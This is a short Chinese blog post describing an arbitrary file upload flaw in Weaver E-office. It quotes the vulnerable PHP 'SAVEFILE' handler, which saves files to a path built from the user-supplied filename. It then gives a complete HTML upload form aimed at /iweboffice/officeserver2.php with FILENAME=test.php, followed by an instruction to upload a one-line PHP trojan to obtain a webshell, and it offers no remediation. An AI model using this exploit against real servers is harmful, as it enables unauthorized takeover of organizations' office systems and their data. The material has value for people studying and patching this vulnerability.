泛微Eoffice任意文件上传可直接getshell

作者: 这是什么娃哈哈 | 来源:发表于2019-01-17 10:17 被阅读0次

泛微Eoffice任意文件上传可直接getshell
网鼎杯java_file writeup
CTF练习平台（七）
webshell实验
flask debug配合文件上传getshell
文件上传漏洞
致远A8 OA系统任意文件上传getshell漏洞分析报告
[upload_labs]文件上传绕过小结
vue-simple-uploader组件的使用感受
美团面经总结

参考链接：https://bugs.shuimugan.com/bug/view?bug_no=125638

1.某文件多处任意文件上传，可直接getshell ，相关代码如下

 case "SAVEFILE" :
                $mRecordID = $RECORDID;
                $mUserName = $USERNAME;
                $mFileName = $FILENAME;
                $mFileType = $FILETYPE;
                $mDescript = $DESCRIPT;
                $mFileDate = $FileDate;
                $mFullPath = $mFilePath."/".$mFileName;
                if ( is_uploaded_file( $_FILES['MsgFileBody']['tmp_name'] ) )
                {
                                if ( move_uploaded_file( $_FILES['MsgFileBody']['tmp_name'], $mFullPath ) )
                                {
                                                $mFileSize = $_FILES['MsgFileBody']['size'];
                                                $result = true;
                                }
                                else
                                {
                                                $MsgObj->MsgError( "Save File Error" );
                                                $result = false;
                                }
                }

2.我们要构造一份表单
OPTION为SAVEFILE，FILENAME是保存的文件名可以自己命名

<select>
  <option value ="volvo">SAVEFILE</option>
</select>
<form method='post' action='/iweboffice/officeserver2.php?OPTION=SAVEFILE&FILENAME=test.php'  enctype="multipart/form-data" > 
<input type="file" name="MsgFileBody" style="height:20px;BORDER: #8F908B 1px solid;"/></br></br>
<button type=submit value="上传">上传</button> </form>

上传一句话木马即可获取webshell